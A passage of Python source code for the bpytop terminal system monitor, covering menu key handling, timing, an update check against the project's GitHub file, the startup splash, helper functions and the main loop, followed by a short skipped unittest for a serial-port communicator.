NetCollector.net_min = {"download" : -1, "upload" : -1}
elif selected == "draw_clock":
Box.clock_on = True if len(CONFIG.draw_clock) > 0 else False
if not Box.clock_on: Draw.clear("clock", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key == "backspace" and len(input_val) > 0:
input_val = input_val[:-1]
elif key == "delete":
input_val = ""
elif isinstance(getattr(CONFIG, selected), str) and len(key) == 1:
input_val += key
elif isinstance(getattr(CONFIG, selected), int) and key.isdigit():
input_val += key
elif key == "q":
clean_quit()
elif key in ["escape", "o", "M", "f2"]:
cls.close = True
break
elif key == "enter" and selected in ["update_ms", "disks_filter", "custom_cpu_name", "net_download", "net_upload", "draw_clock", "tree_depth"]:
inputting = True
input_val = str(getattr(CONFIG, selected))
elif key == "left" and selected == "update_ms" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key == "right" and selected == "update_ms" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "left" and selected == "tree_depth" and CONFIG.tree_depth > 0:
CONFIG.tree_depth -= 1
ProcCollector.collapsed = {}
elif key == "right" and selected == "tree_depth":
CONFIG.tree_depth += 1
ProcCollector.collapsed = {}
elif key in ["left", "right"] and isinstance(getattr(CONFIG, selected), bool):
setattr(CONFIG, selected, not getattr(CONFIG, selected))
if selected == "check_temp":
if CONFIG.check_temp:
CpuCollector.get_sensors()
else:
CpuCollector.sensor_method = ""
CpuCollector.got_sensors = False
if selected in ["net_auto", "net_color_fixed", "net_sync"]:
if selected == "net_auto": NetCollector.auto_min = CONFIG.net_auto
NetBox.redraw = True
if selected == "theme_background":
Term.bg = THEME.main_bg if CONFIG.theme_background else "\033[49m"
Draw.now(Term.bg)
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "color_theme" and len(Theme.themes) > 1:
if key == "left":
color_i -= 1
if color_i < 0: color_i = len(Theme.themes) - 1
elif key == "right":
color_i += 1
if color_i > len(Theme.themes) - 1: color_i = 0
CONFIG.color_theme = list(Theme.themes)[color_i]
THEME(CONFIG.color_theme)
Term.refresh(force=True)
Timer.finish()
elif key in ["left", "right"] and selected == "proc_sorting":
ProcCollector.sorting(key)
elif key in ["left", "right"] and selected == "log_level":
if key == "left":
loglevel_i -= 1
if loglevel_i < 0: loglevel_i = len(CONFIG.log_levels) - 1
elif key == "right":
loglevel_i += 1
if loglevel_i > len(CONFIG.log_levels) - 1: loglevel_i = 0
CONFIG.log_level = CONFIG.log_levels[loglevel_i]
errlog.setLevel(getattr(logging, CONFIG.log_level))
errlog.info(f'Loglevel set to {CONFIG.log_level}')
elif key in ["left", "right"] and selected == "view_mode":
if key == "left":
view_mode_i -= 1
if view_mode_i < 0: view_mode_i = len(CONFIG.view_modes) - 1
elif key == "right":
view_mode_i += 1
if view_mode_i > len(CONFIG.view_modes) - 1: view_mode_i = 0
CONFIG.view_mode = CONFIG.view_modes[view_mode_i]
Box.proc_mode = True if CONFIG.view_mode == "proc" else False
Box.stat_mode = True if CONFIG.view_mode == "stat" else False
if ARG_MODE:
ARG_MODE = ""
Draw.clear(saved=True)
Term.refresh(force=True)
cls.resized = False
elif key == "up":
selected_int -= 1
if selected_int < 0: selected_int = len(option_items) - 1
page = floor(selected_int * 2 / h) + 1
elif key == "down":
selected_int += 1
if selected_int > len(option_items) - 1: selected_int = 0
page = floor(selected_int * 2 / h) + 1
elif key in ["mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
selected_int = (page-1) * ceil(h / 2)
elif key in ["mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
selected_int = (page-1) * ceil(h / 2)
elif has_sel:
pass
else:
redraw = False
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(1)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
class Timer:
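# Paces the main loop: stamp() marks the start of an update cycle, not_zero()/left()
# report whether/how much of CONFIG.update_ms remains, and finish() back-dates the
# stamp and breaks the input wait to force an immediate refresh.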
timestamp: float
return_zero = False
@classmethod
def stamp(cls):
cls.timestamp = time()
@classmethod
def not_zero(cls) -> bool:
if cls.return_zero:
cls.return_zero = False
return False
if cls.timestamp + (CONFIG.update_ms / 1000) > time():
return True
else:
return False
@classmethod
def left(cls) -> float:
return cls.timestamp + (CONFIG.update_ms / 1000) - time()
@classmethod
def finish(cls):
cls.return_zero = True
cls.timestamp = time() - (CONFIG.update_ms / 1000)
Key.break_wait()
class UpdateChecker:
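# Fetches bpytop.py from the master branch on GitHub in a background thread, reads the
# VERSION constant from it and, if it differs from the running version and notify-send
# is available, sends a desktop notification about the new release.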
version: str = VERSION
thread: threading.Thread
@classmethod
def run(cls):
cls.thread = threading.Thread(target=cls._checker)
cls.thread.start()
@classmethod
def _checker(cls):
try:
with urllib.request.urlopen("https://github.com/aristocratos/bpytop/raw/master/bpytop.py", timeout=5) as source: # type: ignore
for line in source:
line = line.decode("utf-8")
if line.startswith("VERSION: str ="):
cls.version = line[(line.index("=")+1):].strip('" \n')
break
except Exception as e:
errlog.exception(f'{e}')
else:
if cls.version != VERSION and which("notify-send"):
try:
subprocess.run(["notify-send", "-u", "normal", "BpyTop Update!",
f'New version of BpyTop available!\nCurrent version: {VERSION}\nNew version: {cls.version}\nDownload at github.com/aristocratos/bpytop',
"-i", "update-notifier", "-t", "10000"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except Exception as e:
errlog.exception(f'{e}')
class Init:
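# Draws the startup splash: the banner, per-step status messages and two randomized
# greyscale graphs as a background while the init steps in main() report success or failure.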
running: bool = True
initbg_colors: List[str] = []
initbg_data: List[int]
initbg_up: Graph
initbg_down: Graph
resized = False
@classmethod
def start(cls):
Draw.buffer("init", z=1)
Draw.buffer("initbg", z=10)
for i in range(51):
for _ in range(2): cls.initbg_colors.append(Color.fg(i, i, i))
Draw.buffer("banner", (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(11)}{Colors.black_bg}{Colors.default}'
f'{Fx.b}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}{Color.fg("#50")}'), z=2)
for _i in range(7):
perc = f'{str(round((_i + 1) * 14 + 2)) + "%":>5}'
Draw.buffer("+banner", f'{Mv.to(Term.height // 2 - 2 + _i, Term.width // 2 - 28)}{Fx.trans(perc)}{Symbol.v_line}')
Draw.out("banner")
Draw.buffer("+init!", f'{Color.fg("#cc")}{Fx.b}{Mv.to(Term.height // 2 - 2, Term.width // 2 - 21)}{Mv.save}')
cls.initbg_data = [randint(0, 100) for _ in range(Term.width * 2)]
cls.initbg_up = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=True)
cls.initbg_down = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=False)
@classmethod
def success(cls):
if not CONFIG.show_init or cls.resized: return
cls.draw_bg(5)
Draw.buffer("+init!", f'{Mv.restore}{Symbol.ok}\n{Mv.r(Term.width // 2 - 22)}{Mv.save}')
@staticmethod
def fail(err):
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Symbol.fail}')
sleep(2)
errlog.exception(f'{err}')
clean_quit(1, errmsg=f'Error during init! See {CONFIG_DIR}/error.log for more information.')
@classmethod
def draw_bg(cls, times: int = 5):
for _ in range(times):
sleep(0.05)
x = randint(0, 100)
Draw.buffer("initbg", f'{Fx.ub}{Mv.to(0, 0)}{cls.initbg_up(x)}{Mv.to(Term.height // 2, 0)}{cls.initbg_down(x)}')
Draw.out("initbg", "banner", "init")
@classmethod
def done(cls):
cls.running = False
if not CONFIG.show_init: return
if cls.resized:
Draw.now(Term.clear)
else:
cls.draw_bg(10)
Draw.clear("initbg", "banner", "init", saved=True)
if cls.resized: return
del cls.initbg_up, cls.initbg_down, cls.initbg_data, cls.initbg_colors
#? Functions ------------------------------------------------------------------------------------->
def get_cpu_name() -> str:
'''Fetch a suitable CPU identifier from the CPU model name string'''
name: str = ""
nlist: List = []
command: str = ""
cmd_out: str = ""
rem_line: str = ""
if SYSTEM == "Linux":
command = "cat /proc/cpuinfo"
rem_line = "model name"
elif SYSTEM == "MacOS":
command ="sysctl -n machdep.cpu.brand_string"
elif SYSTEM == "BSD":
command ="sysctl hw.model"
rem_line = "hw.model"
try:
cmd_out = subprocess.check_output("LANG=C " + command, shell=True, universal_newlines=True)
except:
pass
if rem_line:
for line in cmd_out.split("\n"):
if rem_line in line:
name = re.sub( ".*" + rem_line + ".*:", "", line,1).lstrip()
else:
name = cmd_out
nlist = name.split(" ")
try:
if "Xeon" in name and "CPU" in name:
name = nlist[nlist.index("CPU")+(-1 if name.endswith("CPU") else 1)]
elif "Ryzen" in name:
name = " ".join(nlist[nlist.index("Ryzen"):nlist.index("Ryzen")+3])
elif "Duo" in name and "@" in name:
name = " ".join(nlist[:nlist.index("@")])
elif "CPU" in name and not nlist[0] == "CPU":
name = nlist[nlist.index("CPU")-1]
except:
pass
name = " ".join(name.split())
return name.replace("Processor ", "").replace("CPU ", "").replace("(R)", "").replace("(TM)", "").replace("Intel ", "")
def create_box(x: int = 0, y: int = 0, width: int = 0, height: int = 0, title: str = "", title2: str = "", line_color: Color = None, title_color: Color = None, fill: bool = True, box = None) -> str:
'''Create a box from a box object or by given arguments'''
out: str = f'{Term.fg}{Term.bg}'
if not line_color: line_color = THEME.div_line
if not title_color: title_color = THEME.title
#* Get values from box class if given
if box:
x = box.x
y = box.y
width = box.width
height = box.height
title = box.name
hlines: Tuple[int, int] = (y, y + height - 1)
out += f'{line_color}'
#* Draw all horizontal lines
for hpos in hlines:
out += f'{Mv.to(hpos, x)}{Symbol.h_line * (width - 1)}'
#* Draw all vertical lines and fill if enabled
for hpos in range(hlines[0]+1, hlines[1]):
out += f'{Mv.to(hpos, x)}{Symbol.v_line}{" " * (width-2) if fill else Mv.r(width-2)}{Symbol.v_line}'
#* Draw corners
out += f'{Mv.to(y, x)}{Symbol.left_up}\
{Mv.to(y, x + width - 1)}{Symbol.right_up}\
{Mv.to(y + height - 1, x)}{Symbol.left_down}\
{Mv.to(y + height - 1, x + width - 1)}{Symbol.right_down}'
#* Draw titles if enabled
if title:
out += f'{Mv.to(y, x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title}{Fx.ub}{line_color}{Symbol.title_right}'
if title2:
out += f'{Mv.to(hlines[1], x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title2}{Fx.ub}{line_color}{Symbol.title_right}'
return f'{out}{Term.fg}{Mv.to(y + 1, x + 1)}'
def now_sleeping(signum, frame):
"""Reset terminal settings and stop background input read before putting to sleep"""
Key.stop()
Collector.stop()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
os.kill(os.getpid(), signal.SIGSTOP)
def now_awake(signum, frame):
"""Set terminal settings and restart background input read"""
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Key.start()
Term.refresh()
Box.calc_sizes()
Box.draw_bg()
Collector.start()
def quit_sigint(signum, frame):
"""SIGINT redirection to clean_quit()"""
clean_quit()
def clean_quit(errcode: int = 0, errmsg: str = "", thread: bool = False):
"""Stop background input read, save current config and reset terminal settings before quitting"""
global THREAD_ERROR
if thread:
THREAD_ERROR = errcode
interrupt_main()
return
if THREAD_ERROR: errcode = THREAD_ERROR
Key.stop()
Collector.stop()
if not errcode: CONFIG.save_config()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
if errcode == 0:
errlog.info(f'Exiting. Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
else:
errlog.warning(f'Exiting with errorcode ({errcode}). Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
if not errmsg: errmsg = f'Bpytop exited with errorcode ({errcode}). See {CONFIG_DIR}/error.log for more information!'
if errmsg: print(errmsg)
raise SystemExit(errcode)
def floating_humanizer(value: Union[float, int], bit: bool = False, per_second: bool = False, start: int = 0, short: bool = False) -> str:
'''Scales up in steps of 1024 to highest possible unit and returns string with unit suffixed
* bit=True to use bit units, otherwise bytes
* start=int to set 1024 multiplier starting unit
* short=True always returns 0 decimals and shortens unit to 1 character
'''
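# Works in fixed point: the value is multiplied by 100 (two implied decimals) and then
# shifted right 10 bits per unit step. As a rough example (assuming UNITS["byte"] is
# ("Byte", "KiB", "MiB", ...)), floating_humanizer(1572864) would be expected to
# return "1.50 MiB".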
out: str = ""
mult: int = 8 if bit else 1
selector: int = start
unit: Tuple[str, ...] = UNITS["bit"] if bit else UNITS["byte"]
if isinstance(value, float): value = round(value * 100 * mult)
elif value > 0: value *= 100 * mult
else: value = 0
while len(f'{value}') > 5 and value >= 102400:
value >>= 10
if value < 100:
out = f'{value}'
break
selector += 1
else:
if len(f'{value}') < 5 and len(f'{value}') >= 2 and selector > 0:
decimals = 5 - len(f'{value}')
out = f'{value}'[:-2] + "." + f'{value}'[-decimals:]
elif len(f'{value}') >= 2:
out = f'{value}'[:-2]
else:
out = f'{value}'
if short:
out = out.split(".")[0]
if len(out) > 3:
out = f'{int(out[0]) + 1}'
selector += 1
out += f'{"" if short else " "}{unit[selector][0] if short else unit[selector]}'
if per_second: out += "ps" if bit else "/s"
return out
def units_to_bytes(value: str) -> int:
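# Parses strings such as "10M", "2.5G" or "100Mbit" into a byte count using binary
# multiples; a trailing "bit" divides by 8. For example units_to_bytes("10M") would be
# expected to return 10485760 (10 * 1024**2).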
if not value: return 0
out: int = 0
mult: int = 0
bit: bool = False
value_i: int = 0
units: Dict[str, int] = {"k" : 1, "m" : 2, "g" : 3}
try:
if value.lower().endswith("s"):
value = value[:-1]
if value.lower().endswith("bit"):
bit = True
value = value[:-3]
elif value.lower().endswith("byte"):
value = value[:-4]
if value[-1].lower() in units:
mult = units[value[-1].lower()]
value = value[:-1]
if "." in value and value.replace(".", "").isdigit():
if mult > 0:
value_i = round(float(value) * 1024)
mult -= 1
else:
value_i = round(float(value))
elif value.isdigit():
value_i = int(value)
if bit: value_i = round(value_i / 8)
out = int(value_i) << (10 * mult)
except ValueError:
out = 0
return out
def min_max(value: int, min_value: int=0, max_value: int=100) -> int:
return max(min_value, min(value, max_value))
def process_keys():
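# Drains the key/mouse queue and maps each input to its action in the main UI
# (outside the menus): filtering, sorting, view mode, network toggles, signals to
# the selected process, and process list navigation.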
mouse_pos: Tuple[int, int] = (0, 0)
filtered: bool = False
global ARG_MODE
while Key.has_key():
key = Key.get()
if key in ["mouse_scroll_up", "mouse_scroll_down", "mouse_click"]:
mouse_pos = Key.get_mouse()
if mouse_pos[0] >= ProcBox.x and mouse_pos[1] >= ProcBox.current_y + 1 and mouse_pos[1] < ProcBox.current_y + ProcBox.current_h - 1:
pass
elif key == "mouse_click":
key = "mouse_unselect"
else:
key = "_null"
if ProcBox.filtering:
if key in ["enter", "mouse_click", "mouse_unselect"]:
ProcBox.filtering = False
Collector.collect(ProcCollector, redraw=True, only_draw=True)
continue
elif key in ["escape", "delete"]:
ProcCollector.search_filter = ""
ProcBox.filtering = False
elif len(key) == 1:
ProcCollector.search_filter += key
elif key == "backspace" and len(ProcCollector.search_filter) > 0:
ProcCollector.search_filter = ProcCollector.search_filter[:-1]
else:
continue
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
if filtered: Collector.collect_done.wait(0.1)
filtered = True
continue
if key == "_null":
continue
elif key == "q":
clean_quit()
elif key == "+" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "-" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key in ["b", "n"]:
NetCollector.switch(key)
elif key in ["M", "escape"]:
Menu.main()
elif key in ["o", "f2"]:
Menu.options()
elif key in ["h", "f1"]:
Menu.help()
elif key == "z":
NetCollector.reset = not NetCollector.reset
Collector.collect(NetCollector, redraw=True)
elif key == "y":
CONFIG.net_sync = not CONFIG.net_sync
Collector.collect(NetCollector, redraw=True)
elif key == "a":
NetCollector.auto_min = not NetCollector.auto_min
NetCollector.net_min = {"download" : -1, "upload" : -1}
Collector.collect(NetCollector, redraw=True)
elif key in ["left", "right"]:
ProcCollector.sorting(key)
elif key == " " and CONFIG.proc_tree and ProcBox.selected > 0:
if ProcBox.selected_pid in ProcCollector.collapsed:
ProcCollector.collapsed[ProcBox.selected_pid] = not ProcCollector.collapsed[ProcBox.selected_pid]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "e":
CONFIG.proc_tree = not CONFIG.proc_tree
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "r":
CONFIG.proc_reversed = not CONFIG.proc_reversed
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "c":
CONFIG.proc_per_core = not CONFIG.proc_per_core
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "g":
CONFIG.mem_graphs = not CONFIG.mem_graphs
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "s":
CONFIG.swap_disk = not CONFIG.swap_disk
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "f":
ProcBox.filtering = True
if not ProcCollector.search_filter: ProcBox.start = 0
Collector.collect(ProcCollector, redraw=True, only_draw=True)
elif key == "m":
if ARG_MODE:
ARG_MODE = ""
elif CONFIG.view_modes.index(CONFIG.view_mode) + 1 > len(CONFIG.view_modes) - 1:
CONFIG.view_mode = CONFIG.view_modes[0]
else:
CONFIG.view_mode = CONFIG.view_modes[(CONFIG.view_modes.index(CONFIG.view_mode) + 1)]
Box.proc_mode = True if CONFIG.view_mode == "proc" else False
Box.stat_mode = True if CONFIG.view_mode == "stat" else False
Draw.clear(saved=True)
Term.refresh(force=True)
elif key.lower() in ["t", "k", "i"] and (ProcBox.selected > 0 or ProcCollector.detailed):
pid: int = ProcBox.selected_pid if ProcBox.selected > 0 else ProcCollector.detailed_pid # type: ignore
if psutil.pid_exists(pid):
if key.lower() == "t": sig = signal.SIGTERM
elif key.lower() == "k": sig = signal.SIGKILL
elif key.lower() == "i": sig = signal.SIGINT
try:
os.kill(pid, sig)
except Exception as e:
errlog.error(f'Exception when sending signal {sig} to pid {pid}')
errlog.exception(f'{e}')
elif key == "delete" and ProcCollector.search_filter:
ProcCollector.search_filter = ""
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key == "enter":
if ProcBox.selected > 0 and ProcCollector.detailed_pid != ProcBox.selected_pid and psutil.pid_exists(ProcBox.selected_pid):
ProcCollector.detailed = True
ProcBox.last_selection = ProcBox.selected
ProcBox.selected = 0
ProcCollector.detailed_pid = ProcBox.selected_pid
ProcBox.resized = True
elif ProcCollector.detailed:
ProcBox.selected = ProcBox.last_selection
ProcBox.last_selection = 0
ProcCollector.detailed = False
ProcCollector.detailed_pid = None
ProcBox.resized = True
else:
continue
ProcCollector.details = {}
ProcCollector.details_cpu = []
ProcCollector.details_mem = []
Graphs.detailed_cpu = NotImplemented
Graphs.detailed_mem = NotImplemented
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key in ["up", "down", "mouse_scroll_up", "mouse_scroll_down", "page_up", "page_down", "home", "end", "mouse_click", "mouse_unselect"]:
ProcBox.selector(key, mouse_pos)
#? Pre main -------------------------------------------------------------------------------------->
CPU_NAME: str = get_cpu_name()
THEME: Theme
def main():
global THEME
Term.width = os.get_terminal_size().columns
Term.height = os.get_terminal_size().lines
#? Init -------------------------------------------------------------------------------------->
if DEBUG: TimeIt.start("Init")
#? Switch to alternate screen, clear screen, hide cursor, enable mouse reporting and disable input echo
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Term.refresh(force=True)
#? Start a thread checking for updates while running init
if CONFIG.update_check: UpdateChecker.run()
#? Draw banner and init status
if CONFIG.show_init and not Init.resized:
Init.start()
#? Load theme
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Loading theme and creating colors... ")}{Mv.save}')
try:
THEME = Theme(CONFIG.color_theme)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup boxes
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Doing some maths and drawing... ")}{Mv.save}')
try:
if CONFIG.check_temp: CpuCollector.get_sensors()
Box.calc_sizes()
Box.draw_bg(now=False)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup signal handlers for SIGSTP, SIGCONT, SIGINT and SIGWINCH
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Setting up signal handlers... ")}{Mv.save}')
try:
signal.signal(signal.SIGTSTP, now_sleeping) #* Ctrl-Z
signal.signal(signal.SIGCONT, now_awake) #* Resume
signal.signal(signal.SIGINT, quit_sigint) #* Ctrl-C
signal.signal(signal.SIGWINCH, Term.refresh) #* Terminal resized
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for reading keyboard input
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting input reader thread... ")}{Mv.save}')
try:
Key.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for data collection and drawing
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting data collection and drawer thread... ")}{Mv.save}')
try:
Collector.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Collect data and draw to buffer
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Collecting data and drawing... ")}{Mv.save}')
try:
Collector.collect(draw_now=False)
pass
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Draw to screen
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Finishing up... ")}{Mv.save}')
try:
Collector.collect_done.wait()
except Exception as e:
Init.fail(e)
else:
Init.success()
Init.done()
Term.refresh()
Draw.out(clear=True)
if CONFIG.draw_clock:
Box.clock_on = True
if DEBUG: TimeIt.stop("Init")
#? Main loop ------------------------------------------------------------------------------------->
def run():
while not False:
Term.refresh()
Timer.stamp()
while Timer.not_zero():
if Key.input_wait(Timer.left()):
process_keys()
Collector.collect()
#? Start main loop
try:
run()
except Exception as e:
errlog.exception(f'{e}')
clean_quit(1)
else:
#? Quit cleanly even if false starts being true...
clean_quit()
if __name__ == "__main__":
main()
|
test_communicator.py
|
import sys
import unittest
import threading
import time
from websocket import create_connection
try:
from aceinna.framework.communicators import SerialPort
except: # pylint: disable=bare-except
sys.path.append('./src')
from aceinna.framework.communicators import SerialPort
# pylint: disable=missing-class-docstring
@unittest.skip
class TestUARTCommunicator(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_cancel_while_find(self):
communicator = SerialPort()
def do_find_device():
communicator.find_device(lambda provider: {})
thread = threading.Thread(
target=do_find_device, args=())
thread.start()
time.sleep(1)
communicator.close()
self.assertTrue(True, 'Find device')
if __name__ == '__main__':
unittest.main()
|